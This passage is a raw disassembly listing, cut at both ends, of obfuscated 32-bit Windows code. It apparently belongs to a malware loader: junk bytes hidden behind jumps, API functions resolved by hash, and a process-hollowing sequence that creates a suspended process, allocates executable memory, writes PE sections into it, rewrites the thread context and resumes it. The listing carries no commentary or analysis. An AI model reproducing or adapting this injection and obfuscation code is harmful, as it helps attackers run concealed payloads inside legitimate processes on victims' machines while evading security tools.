seg000:000004C2 sbb edi, [ebp-340h] seg000:000004C8 push 4 seg000:000004CA xor edi, edx seg000:000004CC jmp short loc_4CF seg000:000004CC ; --------------------------------------------------------------------------- seg000:000004CE db 0C8h seg000:000004CF ; --------------------------------------------------------------------------- seg000:000004CF seg000:000004CF loc_4CF: ; CODE XREF: seg000:000004CCj seg000:000004CF push 1000h seg000:000004D4 not eax seg000:000004D6 push dword ptr [ebp-3D0h] seg000:000004DC sub ebx, esi seg000:000004DE push 0 seg000:000004E0 adc [ebp-828h], ecx seg000:000004E6 push 0F3BB9845h seg000:000004EB call sub_19 seg000:000004F0 push 61AA2A9h seg000:000004F5 push eax seg000:000004F6 call sub_108 seg000:000004FB call eax seg000:000004FD sub ebx, 0BCh ; '+' seg000:00000503 mov [ebp-3C4h], eax seg000:00000509 adc esi, ecx seg000:0000050B push 0 seg000:0000050D xchg ebx, ecx seg000:0000050F jmp short loc_513 seg000:0000050F ; --------------------------------------------------------------------------- seg000:00000511 db 92h ; Æ seg000:00000512 db 8Bh seg000:00000513 ; --------------------------------------------------------------------------- seg000:00000513 seg000:00000513 loc_513: ; CODE XREF: seg000:0000050Fj seg000:00000513 lea eax, [ebp-3D0h] seg000:00000519 inc ebx seg000:0000051A push eax seg000:0000051B inc edx seg000:0000051C jmp short loc_520 seg000:0000051C ; --------------------------------------------------------------------------- seg000:0000051E dw 9E33h seg000:00000520 ; --------------------------------------------------------------------------- seg000:00000520 seg000:00000520 loc_520: ; CODE XREF: seg000:0000051Cj seg000:00000520 push dword ptr [ebp-3D0h] seg000:00000526 adc edi, eax seg000:00000528 push dword ptr [ebp-3C4h] seg000:0000052E dec ecx seg000:0000052F jmp short loc_532 seg000:00000531 ; --------------------------------------------------------------------------- seg000:00000531 push esi seg000:00000532 seg000:00000532 loc_532: ; CODE XREF: seg000:0000052Fj seg000:00000532 push dword ptr [ebp-3DCh] seg000:00000538 xor edx, 0DBh seg000:0000053E jmp short loc_542 seg000:00000540 ; --------------------------------------------------------------------------- seg000:00000540 jz short loc_5B6 seg000:00000542 seg000:00000542 loc_542: ; CODE XREF: seg000:0000053Ej seg000:00000542 push 0F3BB9845h seg000:00000547 call sub_19 seg000:0000054C push 0C5D7469Bh seg000:00000551 push eax seg000:00000552 call sub_108 seg000:00000557 call eax seg000:00000559 or eax, 8Dh seg000:0000055E push dword ptr [ebp-3DCh] seg000:00000564 and edi, edi seg000:00000566 jmp short loc_569 seg000:00000566 ; --------------------------------------------------------------------------- seg000:00000568 db 6Bh seg000:00000569 ; --------------------------------------------------------------------------- seg000:00000569 seg000:00000569 loc_569: ; CODE XREF: seg000:00000566j seg000:00000569 push 0F3BB9845h seg000:0000056E call sub_19 seg000:00000573 push 0BAB06348h seg000:00000578 push eax seg000:00000579 call sub_108 seg000:0000057E call eax seg000:00000580 inc edx seg000:00000581 mov eax, 0A0D3CD56h seg000:00000586 and dword ptr [ebp-50h], 2Eh seg000:0000058A mov ecx, 5 seg000:0000058F add edi, 64h ; 'd' seg000:00000592 jmp short loc_596 seg000:00000592 ; --------------------------------------------------------------------------- seg000:00000594 db 66h, 0D1h seg000:00000596 ; --------------------------------------------------------------------------- seg000:00000596 seg000:00000596 loc_596: ; CODE XREF: seg000:00000592j seg000:00000596 lea edi, [ebp-3Ch] seg000:00000599 not edx seg000:0000059B jmp short loc_5A0 seg000:0000059B ; --------------------------------------------------------------------------- seg000:0000059D db 5Bh ; [ seg000:0000059E dw 63F6h seg000:000005A0 ; --------------------------------------------------------------------------- seg000:000005A0 seg000:000005A0 loc_5A0: ; CODE XREF: seg000:0000059Bj seg000:000005A0 ; seg000:000005B4j seg000:000005A0 dec edx seg000:000005A1 mov edx, eax seg000:000005A3 imul ebx, edx seg000:000005A6 rol edx, 7 seg000:000005A9 xchg ebx, ebx seg000:000005AB add eax, edx seg000:000005AD neg esi seg000:000005AF stosd seg000:000005B0 adc edx, [ebp-48h] seg000:000005B3 dec ecx seg000:000005B4 jnz short loc_5A0 seg000:000005B6 seg000:000005B6 loc_5B6: ; CODE XREF: seg000:00000540j seg000:000005B6 sub dword ptr [ebp-4], 9Fh ; 'ƒ' seg000:000005BD mov ecx, [ebp-3D0h] seg000:000005C3 sub dword ptr [ebp-818h], 43h ; 'C' seg000:000005CA sub ecx, 4 seg000:000005CD or esi, 59h seg000:000005D0 jmp short loc_5D4 seg000:000005D0 ; --------------------------------------------------------------------------- seg000:000005D2 db 27h ; ' seg000:000005D3 db 0A1h seg000:000005D4 ; --------------------------------------------------------------------------- seg000:000005D4 seg000:000005D4 loc_5D4: ; CODE XREF: seg000:000005D0j seg000:000005D4 mov esi, [ebp-3C4h] seg000:000005DA seg000:000005DA loc_5DA: ; CODE XREF: seg000:00000623j seg000:000005DA not edi seg000:000005DC seg000:000005DC loc_5DC: ; CODE XREF: seg000:00000610j seg000:000005DC dec edx seg000:000005DD mov eax, [esi+ecx] seg000:000005E0 xchg edi, ebx seg000:000005E2 cmp eax, [ebp-3Ch] seg000:000005E5 jnz short loc_60D seg000:000005E7 xchg eax, edx seg000:000005E8 add ecx, 4 seg000:000005EB adc edx, eax seg000:000005ED jmp short loc_5F2 seg000:000005ED ; --------------------------------------------------------------------------- seg000:000005EF db 0F5h ; § seg000:000005F0 db 0E1h, 4Ah seg000:000005F2 ; --------------------------------------------------------------------------- seg000:000005F2 seg000:000005F2 loc_5F2: ; CODE XREF: seg000:000005EDj seg000:000005F2 mov eax, [esi+ecx] seg000:000005F5 xor edx, edi seg000:000005F7 sub ecx, 4 seg000:000005FA and edx, [ebp-1Ch] seg000:000005FD jmp short loc_601 seg000:000005FF ; --------------------------------------------------------------------------- seg000:000005FF icebp seg000:00000600 sti seg000:00000601 seg000:00000601 loc_601: ; CODE XREF: seg000:000005FDj seg000:00000601 cmp eax, [ebp-38h] seg000:00000604 jnz short loc_60D seg000:00000606 and edi, esi seg000:00000608 jmp short loc_61F seg000:0000060A ; --------------------------------------------------------------------------- seg000:0000060A adc eax, 40h ; '@' seg000:0000060D seg000:0000060D loc_60D: ; CODE XREF: seg000:000005E5j seg000:0000060D ; seg000:00000604j seg000:0000060D adc eax, edi seg000:0000060F dec ecx seg000:00000610 jnz short loc_5DC seg000:00000612 sub edx, 97h ; 'ù' seg000:00000618 jmp loc_C6B seg000:0000061D ; --------------------------------------------------------------------------- seg000:0000061D and ebx, ecx seg000:0000061F seg000:0000061F loc_61F: ; CODE XREF: seg000:00000608j seg000:0000061F sbb edx, ecx seg000:00000621 jmp short loc_625 seg000:00000623 ; --------------------------------------------------------------------------- seg000:00000623 jge short loc_5DA seg000:00000625 seg000:00000625 loc_625: ; CODE XREF: seg000:00000621j seg000:00000625 mov eax, [ebp-34h] seg000:00000628 add ebx, 0Fh seg000:0000062B add ecx, 8 seg000:0000062E imul edx, ecx seg000:00000631 xor eax, [esi+ecx] seg000:00000634 not edi seg000:00000636 jmp short loc_639 seg000:00000636 ; --------------------------------------------------------------------------- seg000:00000638 db 0F3h seg000:00000639 ; --------------------------------------------------------------------------- seg000:00000639 seg000:00000639 loc_639: ; CODE XREF: seg000:00000636j seg000:00000639 mov [ebp-14h], eax seg000:0000063C mov edi, ecx seg000:0000063E mov eax, [ebp-30h] seg000:00000641 imul ebx, esi seg000:00000644 add ecx, 4 seg000:00000647 dec edi seg000:00000648 xor eax, [esi+ecx] seg000:0000064B inc edi seg000:0000064C jmp short loc_651 seg000:0000064E ; --------------------------------------------------------------------------- seg000:0000064E fisub dword ptr [eax] seg000:00000650 sti seg000:00000651 seg000:00000651 loc_651: ; CODE XREF: seg000:0000064Cj seg000:00000651 mov [ebp-0Ch], eax seg000:00000654 not edx seg000:00000656 mov eax, [ebp-2Ch] seg000:00000659 mov edx, 0E1h ; 'ß' seg000:0000065E add ecx, 4 seg000:00000661 neg edi seg000:00000663 xor eax, [esi+ecx] seg000:00000666 not edi seg000:00000668 mov [ebp-20h], eax seg000:0000066B imul ebx, edx seg000:0000066E mov eax, esi seg000:00000670 sbb edx, esi seg000:00000672 add eax, ecx seg000:00000674 imul edi, edi seg000:00000677 add eax, 4 seg000:0000067A dec edx seg000:0000067B mov [ebp-3BCh], eax seg000:00000681 dec ecx seg000:00000682 jmp short loc_686 seg000:00000682 ; --------------------------------------------------------------------------- seg000:00000684 db 63h, 31h seg000:00000686 ; --------------------------------------------------------------------------- seg000:00000686 seg000:00000686 loc_686: ; CODE XREF: seg000:00000682j seg000:00000686 push dword ptr [ebp-20h] seg000:00000689 inc esi seg000:0000068A push dword ptr [ebp-14h] seg000:0000068D inc eax seg000:0000068E push dword ptr [ebp-3BCh] seg000:00000694 dec esi seg000:00000695 call sub_24E seg000:0000069A xor edx, ecx seg000:0000069C push 4 seg000:0000069E imul eax, esi seg000:000006A1 jmp short loc_6A6 seg000:000006A1 ; --------------------------------------------------------------------------- seg000:000006A3 db 0BAh seg000:000006A4 db 98h ; ÿ seg000:000006A5 db 9 seg000:000006A6 ; --------------------------------------------------------------------------- seg000:000006A6 seg000:000006A6 loc_6A6: ; CODE XREF: seg000:000006A1j seg000:000006A6 push 1000h seg000:000006AB sbb ecx, [ebp-44h] seg000:000006AE push dword ptr [ebp-0Ch] seg000:000006B1 xor eax, [ebp-81Ch] seg000:000006B7 jmp short loc_6BB seg000:000006B9 ; --------------------------------------------------------------------------- seg000:000006B9 push ds seg000:000006BA lock seg000:000006BB seg000:000006BB loc_6BB: ; CODE XREF: seg000:000006B7j seg000:000006BB push 0 seg000:000006BD xchg eax, ebx seg000:000006BE push 0F3BB9845h seg000:000006C3 call sub_19 seg000:000006C8 push 61AA2A9h seg000:000006CD push eax seg000:000006CE call sub_108 seg000:000006D3 call eax seg000:000006D5 dec ecx seg000:000006D6 mov [ebp-3B4h], eax seg000:000006DC imul esi, esi seg000:000006DF jmp short loc_6E4 seg000:000006E1 ; --------------------------------------------------------------------------- seg000:000006E1 pop esp seg000:000006E2 mov dh, 6Ah ; 'j' seg000:000006E4 seg000:000006E4 loc_6E4: ; CODE XREF: seg000:000006DFj seg000:000006E4 lea eax, [ebp-3A8h] seg000:000006EA sbb ecx, esi seg000:000006EC push eax seg000:000006ED xor ebx, [ebp-800h] seg000:000006F3 jmp short loc_6F6 seg000:000006F5 ; --------------------------------------------------------------------------- seg000:000006F5 lodsd seg000:000006F6 seg000:000006F6 loc_6F6: ; CODE XREF: seg000:000006F3j seg000:000006F6 push dword ptr [ebp-14h] seg000:000006F9 inc edx seg000:000006FA jmp short loc_6FD seg000:000006FC ; --------------------------------------------------------------------------- seg000:000006FC push cs seg000:000006FD seg000:000006FD loc_6FD: ; CODE XREF: seg000:000006FAj seg000:000006FD push dword ptr [ebp-3BCh] seg000:00000703 adc ebx, [ebp-44h] seg000:00000706 push dword ptr [ebp-0Ch] seg000:00000709 mov dword ptr [ebp-810h], 82h ; 'é' seg000:00000713 push dword ptr [ebp-3B4h] seg000:00000719 imul edi, 26h seg000:0000071C push 2 seg000:0000071E xchg edi, [ebp-3D8h] seg000:00000724 push 0EA1E03A2h seg000:00000729 call sub_19 seg000:0000072E push 54744B0Dh seg000:00000733 push eax seg000:00000734 call sub_108 seg000:00000739 call eax seg000:0000073B or ebx, eax seg000:0000073D cmp eax, 80000000h seg000:00000742 jb short loc_786 seg000:00000744 xor [ebp-358h], ecx seg000:0000074A jmp short loc_74F seg000:0000074A ; --------------------------------------------------------------------------- seg000:0000074C db 2Eh, 19h, 5Ch seg000:0000074F ; --------------------------------------------------------------------------- seg000:0000074F seg000:0000074F loc_74F: ; CODE XREF: seg000:0000074Aj seg000:0000074F cmp eax, 0C0000242h seg000:00000754 jz short loc_786 seg000:00000756 imul esi, 0C0h seg000:0000075C push 0 seg000:0000075E xor ebx, 0E9h seg000:00000764 push 0F3BB9845h seg000:00000769 call sub_19 seg000:0000076E push 0CE4C6283h seg000:00000773 push eax seg000:00000774 call sub_108 seg000:00000779 call eax seg000:0000077B or edi, 0C5h seg000:00000781 jmp short loc_786 seg000:00000783 ; --------------------------------------------------------------------------- seg000:00000783 fdivr qword ptr [edi+68h] seg000:00000786 seg000:00000786 loc_786: ; CODE XREF: seg000:00000742j seg000:00000786 ; seg000:00000754j ... seg000:00000786 sub eax, esi seg000:00000788 push 4000h seg000:0000078D mov eax, ebx seg000:0000078F push dword ptr [ebp-3D0h] seg000:00000795 sub ecx, ebx seg000:00000797 push dword ptr [ebp-3C4h] seg000:0000079D not edx seg000:0000079F push 0F3BB9845h seg000:000007A4 call sub_19 seg000:000007A9 push 0A8308754h seg000:000007AE push eax seg000:000007AF call sub_108 seg000:000007B4 call eax seg000:000007B6 adc eax, [ebp-800h] seg000:000007BC jmp short loc_7C0 seg000:000007BC ; --------------------------------------------------------------------------- seg000:000007BE dw 9B26h seg000:000007C0 ; --------------------------------------------------------------------------- seg000:000007C0 seg000:000007C0 loc_7C0: ; CODE XREF: seg000:000007BCj seg000:000007C0 push 10h seg000:000007C2 adc edi, 48h ; 'H' seg000:000007C5 lea eax, [ebp-350h] seg000:000007CB and edx, 1Fh seg000:000007CE push eax seg000:000007CF mov ebx, 0E8h ; 'Þ' seg000:000007D4 jmp short loc_7D9 seg000:000007D6 ; --------------------------------------------------------------------------- seg000:000007D6 mov [eax+10h], ch seg000:000007D9 seg000:000007D9 loc_7D9: ; CODE XREF: seg000:000007D4j seg000:000007D9 push 0EA1E03A2h seg000:000007DE call sub_19 seg000:000007E3 push 55486AFEh seg000:000007E8 push eax seg000:000007E9 call sub_108 seg000:000007EE call eax seg000:000007F0 mov ebx, edi seg000:000007F2 push 44h ; 'D' seg000:000007F4 not ebx seg000:000007F6 lea eax, [ebp-3A0h] seg000:000007FC inc edx seg000:000007FD push eax seg000:000007FE imul edx, 0E3h seg000:00000804 jmp short loc_808 seg000:00000804 ; --------------------------------------------------------------------------- seg000:00000806 db 0FCh ; ³ seg000:00000807 db 13h seg000:00000808 ; --------------------------------------------------------------------------- seg000:00000808 seg000:00000808 loc_808: ; CODE XREF: seg000:00000804j seg000:00000808 push 0EA1E03A2h seg000:0000080D call sub_19 seg000:00000812 push 55486AFEh seg000:00000817 push eax seg000:00000818 call sub_108 seg000:0000081D call eax seg000:0000081F mov ecx, 35h ; '5' seg000:00000824 jmp short loc_827 seg000:00000824 ; --------------------------------------------------------------------------- seg000:00000826 db 3 seg000:00000827 ; --------------------------------------------------------------------------- seg000:00000827 seg000:00000827 loc_827: ; CODE XREF: seg000:00000824j seg000:00000827 ; seg000:00000A0Cj seg000:00000827 push 0F3BB9845h seg000:0000082C call sub_19 seg000:00000831 push 71E5007Ch seg000:00000836 push eax seg000:00000837 call sub_108 seg000:0000083C call eax seg000:0000083E imul esi, ecx seg000:00000841 mov ecx, eax seg000:00000843 and ebx, edi seg000:00000845 jmp short loc_849 seg000:00000847 ; --------------------------------------------------------------------------- seg000:00000847 sal dh, 1 seg000:00000849 seg000:00000849 loc_849: ; CODE XREF: seg000:00000845j seg000:00000849 mov dword ptr [ebp-3A0h], 44h ; 'D' seg000:00000853 sbb edx, ecx seg000:00000855 lea eax, [ebp-350h] seg000:0000085B neg edi seg000:0000085D push eax seg000:0000085E imul ebx, esi seg000:00000861 lea eax, [ebp-3A0h] seg000:00000867 sbb edx, 0F4h ; '¶' seg000:0000086D push eax seg000:0000086E and edx, [ebp-7ECh] seg000:00000874 push 0 seg000:00000876 sub eax, edi seg000:00000878 push 0 seg000:0000087A imul esi, eax seg000:0000087D push 4 seg000:0000087F mov edi, ebx seg000:00000881 push 0 seg000:00000883 sub esi, [ebp-808h] seg000:00000889 push 0 seg000:0000088B sub edi, 0FBh ; '¹' seg000:00000891 jmp short loc_896 seg000:00000893 ; --------------------------------------------------------------------------- seg000:00000893 pop ecx seg000:00000895 icebp seg000:00000896 seg000:00000896 loc_896: ; CODE XREF: seg000:00000891j seg000:00000896 push 0 seg000:00000898 sbb ebx, esi seg000:0000089A jmp short loc_89F seg000:0000089A ; --------------------------------------------------------------------------- seg000:0000089C db 0E7h, 38h, 0ABh seg000:0000089F ; --------------------------------------------------------------------------- seg000:0000089F seg000:0000089F loc_89F: ; CODE XREF: seg000:0000089Aj seg000:0000089F push ecx seg000:000008A0 xor [ebp-3D8h], eax seg000:000008A6 push 0 seg000:000008A8 or [ebp-3B8h], eax seg000:000008AE push 0F3BB9845h seg000:000008B3 call sub_19 seg000:000008B8 push 1973003Fh seg000:000008BD push eax seg000:000008BE call sub_108 seg000:000008C3 call eax seg000:000008C5 adc edi, [ebp-50h] seg000:000008C8 mov eax, [ebp-3B4h] seg000:000008CE xchg edx, [ebp-808h] seg000:000008D4 jmp short loc_8D7 seg000:000008D6 ; --------------------------------------------------------------------------- seg000:000008D6 cdq seg000:000008D7 seg000:000008D7 loc_8D7: ; CODE XREF: seg000:000008D4j seg000:000008D7 add eax, [eax+3Ch] seg000:000008DA dec edx seg000:000008DB mov [ebp-4Ch], eax seg000:000008DE not ecx seg000:000008E0 mov eax, [eax+34h] seg000:000008E3 mov dword ptr [ebp-54h], 1 seg000:000008EA mov [ebp-5Ch], eax seg000:000008ED xchg edi, ebx seg000:000008EF push dword ptr [ebp-5Ch] seg000:000008F2 not ecx seg000:000008F4 push dword ptr [ebp-350h] seg000:000008FA mov eax, esi seg000:000008FC push 0EA1E03A2h seg000:00000901 call sub_19 seg000:00000906 push 5D51236Ch seg000:0000090B push eax seg000:0000090C call sub_108 seg000:00000911 call eax seg000:00000913 sub edi, eax seg000:00000915 jmp short loc_919 seg000:00000915 ; --------------------------------------------------------------------------- seg000:00000917 db 63h seg000:00000918 db 0D9h seg000:00000919 ; --------------------------------------------------------------------------- seg000:00000919 seg000:00000919 loc_919: ; CODE XREF: seg000:00000915j seg000:00000919 push 40h ; '@' seg000:0000091B not ecx seg000:0000091D jmp short loc_922 seg000:0000091F ; --------------------------------------------------------------------------- seg000:0000091F dec ebx seg000:00000920 out 3Dh, eax seg000:00000922 seg000:00000922 loc_922: ; CODE XREF: seg000:0000091Dj seg000:00000922 push 3000h seg000:00000927 mov dword ptr [ebp-824h], 0BEh ; '¥' seg000:00000931 jmp short loc_934 seg000:00000931 ; --------------------------------------------------------------------------- seg000:00000933 db 2Ch seg000:00000934 ; --------------------------------------------------------------------------- seg000:00000934 seg000:00000934 loc_934: ; CODE XREF: seg000:00000931j seg000:00000934 mov eax, [ebp-4Ch] seg000:00000937 xchg edx, [ebp-824h] seg000:0000093D push dword ptr [eax+50h] seg000:00000940 and esi, 46h seg000:00000943 jmp short loc_946 seg000:00000943 ; --------------------------------------------------------------------------- seg000:00000945 db 0D0h seg000:00000946 ; --------------------------------------------------------------------------- seg000:00000946 seg000:00000946 loc_946: ; CODE XREF: seg000:00000943j seg000:00000946 push dword ptr [ebp-5Ch] seg000:00000949 imul esi, 37h seg000:0000094C push dword ptr [ebp-350h] seg000:00000952 dec ebx seg000:00000953 push 0F3BB9845h seg000:00000958 call sub_19 seg000:0000095D push 6452663Fh seg000:00000962 push eax seg000:00000963 call sub_108 seg000:00000968 call eax seg000:0000096A adc esi, [ebp-80Ch] seg000:00000970 jmp short loc_975 seg000:00000970 ; --------------------------------------------------------------------------- seg000:00000972 db 0B0h ; ¦ seg000:00000973 ; --------------------------------------------------------------------------- seg000:00000973 retn seg000:00000973 ; --------------------------------------------------------------------------- seg000:00000974 db 8Eh seg000:00000975 ; --------------------------------------------------------------------------- seg000:00000975 seg000:00000975 loc_975: ; CODE XREF: seg000:00000970j seg000:00000975 push 0 seg000:00000977 neg edx seg000:00000979 jmp short loc_97D seg000:00000979 ; --------------------------------------------------------------------------- seg000:0000097B db 0E8h seg000:0000097C db 65h seg000:0000097D ; --------------------------------------------------------------------------- seg000:0000097D seg000:0000097D loc_97D: ; CODE XREF: seg000:00000979j seg000:0000097D mov eax, [ebp-4Ch] seg000:00000980 dec edi seg000:00000981 jmp short loc_984 seg000:00000981 ; --------------------------------------------------------------------------- seg000:00000983 db 0F2h seg000:00000984 ; --------------------------------------------------------------------------- seg000:00000984 seg000:00000984 loc_984: ; CODE XREF: seg000:00000981j seg000:00000984 push dword ptr [eax+54h] seg000:00000987 xchg eax, edi seg000:00000988 push dword ptr [ebp-3B4h] seg000:0000098E neg edi seg000:00000990 push dword ptr [ebp-5Ch] seg000:00000993 add edx, edx seg000:00000995 push dword ptr [ebp-350h] seg000:0000099B sub eax, eax seg000:0000099D push 0F3BB9845h seg000:000009A2 call sub_19 seg000:000009A7 push 0F0741Eh seg000:000009AC push eax seg000:000009AD call sub_108 seg000:000009B2 call eax seg000:000009B4 not ebx seg000:000009B6 jmp short loc_9BB seg000:000009B8 ; --------------------------------------------------------------------------- seg000:000009B8 retf seg000:000009B8 ; --------------------------------------------------------------------------- seg000:000009B9 db 6Fh, 0D7h seg000:000009BB ; --------------------------------------------------------------------------- seg000:000009BB seg000:000009BB loc_9BB: ; CODE XREF: seg000:000009B6j seg000:000009BB cmp eax, 1 seg000:000009BE jz short loc_A11 seg000:000009C0 add esi, ebx seg000:000009C2 push 64h ; 'd' seg000:000009C4 inc esi seg000:000009C5 push 0F3BB9845h seg000:000009CA call sub_19 seg000:000009CF push 0BB14AD42h seg000:000009D4 push eax seg000:000009D5 call sub_108 seg000:000009DA call eax seg000:000009DC sub edx, edi seg000:000009DE jmp short loc_9E3 seg000:000009E0 ; --------------------------------------------------------------------------- seg000:000009E0 lds esp, [ebx+eax*2] seg000:000009E3 seg000:000009E3 loc_9E3: ; CODE XREF: seg000:000009DEj seg000:000009E3 push 0 seg000:000009E5 inc ecx seg000:000009E6 jmp short loc_9EB seg000:000009E6 ; --------------------------------------------------------------------------- seg000:000009E8 db 7Bh, 40h, 0B0h seg000:000009EB ; --------------------------------------------------------------------------- seg000:000009EB seg000:000009EB loc_9EB: ; CODE XREF: seg000:000009E6j seg000:000009EB push dword ptr [ebp-350h] seg000:000009F1 adc ecx, edi seg000:000009F3 push 0F3BB9845h seg000:000009F8 call sub_19 seg000:000009FD push 0E3BEEF33h seg000:00000A02 push eax seg000:00000A03 call sub_108 seg000:00000A08 call eax seg000:00000A0A not esi seg000:00000A0C jmp loc_827 seg000:00000A11 ; --------------------------------------------------------------------------- seg000:00000A11 seg000:00000A11 loc_A11: ; CODE XREF: seg000:000009BEj seg000:00000A11 neg ecx seg000:00000A13 mov eax, [ebp-4Ch] seg000:00000A16 not ecx seg000:00000A18 jmp short loc_A1D seg000:00000A18 ; --------------------------------------------------------------------------- seg000:00000A1A db 0FBh ; ¹ seg000:00000A1B db 55h seg000:00000A1C db 2 seg000:00000A1D ; --------------------------------------------------------------------------- seg000:00000A1D seg000:00000A1D loc_A1D: ; CODE XREF: seg000:00000A18j seg000:00000A1D movzx ecx, word ptr [eax+6] seg000:00000A21 neg ebx seg000:00000A23 lea esi, [eax+0F8h] seg000:00000A29 not edx seg000:00000A2B seg000:00000A2B loc_A2B: ; CODE XREF: seg000:00000AA7j seg000:00000A2B xor ebx, 0D7h seg000:00000A31 push ecx seg000:00000A32 not edx seg000:00000A34 mov eax, [ebp-3B4h] seg000:00000A3A and edx, [ebp-3C0h] seg000:00000A40 jmp short loc_A44 seg000:00000A40 ; --------------------------------------------------------------------------- seg000:00000A42 dw 48D8h seg000:00000A44 ; --------------------------------------------------------------------------- seg000:00000A44 seg000:00000A44 loc_A44: ; CODE XREF: seg000:00000A40j seg000:00000A44 add eax, [esi+14h] seg000:00000A47 and ecx, ebx seg000:00000A49 mov ecx, [ebp-5Ch] seg000:00000A4C inc edi seg000:00000A4D jmp short loc_A50 seg000:00000A4F ; --------------------------------------------------------------------------- seg000:00000A4F std seg000:00000A50 seg000:00000A50 loc_A50: ; CODE XREF: seg000:00000A4Dj seg000:00000A50 add ecx, [esi+0Ch] seg000:00000A53 adc edi, esi seg000:00000A55 jmp short loc_A59 seg000:00000A57 ; --------------------------------------------------------------------------- seg000:00000A57 inc ebp seg000:00000A58 pop es seg000:00000A59 seg000:00000A59 loc_A59: ; CODE XREF: seg000:00000A55j seg000:00000A59 and ebx, eax seg000:00000A5B jmp short loc_A60 seg000:00000A5D ; --------------------------------------------------------------------------- seg000:00000A5D ror ebp, cl seg000:00000A5F das seg000:00000A60 seg000:00000A60 loc_A60: ; CODE XREF: seg000:00000A5Bj seg000:00000A60 push 0 seg000:00000A62 imul edx, eax seg000:00000A65 jmp short loc_A68 seg000:00000A67 ; --------------------------------------------------------------------------- seg000:00000A67 xchg eax, esp seg000:00000A68 seg000:00000A68 loc_A68: ; CODE XREF: seg000:00000A65j seg000:00000A68 push dword ptr [esi+10h] seg000:00000A6B sub edi, eax seg000:00000A6D jmp short loc_A71 seg000:00000A6D ; --------------------------------------------------------------------------- seg000:00000A6F db 2Ah seg000:00000A70 db 8Fh seg000:00000A71 ; --------------------------------------------------------------------------- seg000:00000A71 seg000:00000A71 loc_A71: ; CODE XREF: seg000:00000A6Dj seg000:00000A71 push eax seg000:00000A72 xor ebx, [ebp-7ECh] seg000:00000A78 push ecx seg000:00000A79 not ecx seg000:00000A7B push dword ptr [ebp-350h] seg000:00000A81 dec ebx seg000:00000A82 push 0F3BB9845h seg000:00000A87 call sub_19 seg000:00000A8C push 0F0741Eh seg000:00000A91 push eax seg000:00000A92 call sub_108 seg000:00000A97 call eax seg000:00000A99 inc ecx seg000:00000A9A add esi, 28h ; '(' seg000:00000A9D add edx, ebx seg000:00000A9F pop ecx seg000:00000AA0 sbb eax, [ebp-340h] seg000:00000AA6 dec ecx seg000:00000AA7 jnz short loc_A2B seg000:00000AA9 and edx, [ebp-340h] seg000:00000AAF mov dword ptr [ebp-334h], 10007h seg000:00000AB9 xor eax, esi seg000:00000ABB lea eax, [ebp-334h] seg000:00000AC1 not edi seg000:00000AC3 jmp short loc_AC7 seg000:00000AC3 ; --------------------------------------------------------------------------- seg000:00000AC5 db 0BEh, 22h seg000:00000AC7 ; --------------------------------------------------------------------------- seg000:00000AC7 seg000:00000AC7 loc_AC7: ; CODE XREF: seg000:00000AC3j seg000:00000AC7 push eax seg000:00000AC8 not edx seg000:00000ACA push dword ptr [ebp-34Ch] seg000:00000AD0 mov ecx, esi seg000:00000AD2 jmp short loc_AD6 seg000:00000AD4 ; --------------------------------------------------------------------------- seg000:00000AD4 push ebx seg000:00000AD5 pushf seg000:00000AD6 seg000:00000AD6 loc_AD6: ; CODE XREF: seg000:00000AD2j seg000:00000AD6 push 0F3BB9845h seg000:00000ADB call sub_19 seg000:00000AE0 push 89556355h seg000:00000AE5 push eax seg000:00000AE6 call sub_108 seg000:00000AEB call eax seg000:00000AED add edi, 5Eh ; '^' seg000:00000AF0 mov eax, [ebp-290h] seg000:00000AF6 inc ebx seg000:00000AF7 add eax, 8 seg000:00000AFA not ecx seg000:00000AFC push 0 seg000:00000AFE imul edx, esi seg000:00000B01 push 4 seg000:00000B03 xchg ebx, edi seg000:00000B05 lea ecx, [ebp-5Ch] seg000:00000B08 not esi seg000:00000B0A push ecx seg000:00000B0B adc edx, ecx seg000:00000B0D push eax seg000:00000B0E and ecx, ecx seg000:00000B10 push dword ptr [ebp-350h] seg000:00000B16 xor ebx, [ebp-40h] seg000:00000B19 push 0F3BB9845h seg000:00000B1E call sub_19 seg000:00000B23 push 0F0741Eh seg000:00000B28 push eax seg000:00000B29 call sub_108 seg000:00000B2E call eax seg000:00000B30 inc ebx seg000:00000B31 mov eax, [ebp-4Ch] seg000:00000B34 adc ecx, ecx seg000:00000B36 mov eax, [eax+28h] seg000:00000B39 not edi seg000:00000B3B jmp short loc_B3E seg000:00000B3B ; --------------------------------------------------------------------------- seg000:00000B3D db 81h seg000:00000B3E ; --------------------------------------------------------------------------- seg000:00000B3E seg000:00000B3E loc_B3E: ; CODE XREF: seg000:00000B3Bj seg000:00000B3E add eax, [ebp-5Ch] seg000:00000B41 imul edi, eax seg000:00000B44 jmp short loc_B47 seg000:00000B46 ; --------------------------------------------------------------------------- seg000:00000B46 dec ecx seg000:00000B47 seg000:00000B47 loc_B47: ; CODE XREF: seg000:00000B44j seg000:00000B47 mov [ebp-27Ch], eax seg000:00000B4D xor dword ptr [ebp-58h], 10h seg000:00000B51 lea eax, [ebp-334h] seg000:00000B57 add edx, esi seg000:00000B59 push eax seg000:00000B5A dec edi seg000:00000B5B push dword ptr [ebp-34Ch] seg000:00000B61 or ecx, ebx seg000:00000B63 jmp short loc_B68 seg000:00000B63 ; --------------------------------------------------------------------------- seg000:00000B65 db 0Dh, 16h, 7Fh seg000:00000B68 ; --------------------------------------------------------------------------- seg000:00000B68 seg000:00000B68 loc_B68: ; CODE XREF: seg000:00000B63j seg000:00000B68 push 0F3BB9845h seg000:00000B6D call sub_19 seg000:00000B72 push 8955C355h seg000:00000B77 push eax seg000:00000B78 call sub_108 seg000:00000B7D call eax seg000:00000B7F push 0F3BB9845h seg000:00000B84 sbb ebx, 0D1h ; 'Ð' seg000:00000B8A call sub_19 seg000:00000B8F mov ebx, [ebp-7F4h] seg000:00000B95 push 0CE4C6283h seg000:00000B9A dec ecx seg000:00000B9B jmp short loc_B9E seg000:00000B9B ; --------------------------------------------------------------------------- seg000:00000B9D db 6Dh seg000:00000B9E ; --------------------------------------------------------------------------- seg000:00000B9E seg000:00000B9E loc_B9E: ; CODE XREF: seg000:00000B9Bj seg000:00000B9E push eax seg000:00000B9F add [ebp-3CCh], eax seg000:00000BA5 call sub_108 seg000:00000BAA sbb ecx, edi seg000:00000BAC push eax seg000:00000BAD and esi, edi seg000:00000BAF mov ecx, esp seg000:00000BB1 xor esi, 3Bh seg000:00000BB4 jmp short loc_BB9 seg000:00000BB4 ; --------------------------------------------------------------------------- seg000:00000BB6 dw 266h seg000:00000BB8 db 5 seg000:00000BB9 ; --------------------------------------------------------------------------- seg000:00000BB9 seg000:00000BB9 loc_BB9: ; CODE XREF: seg000:00000BB4j 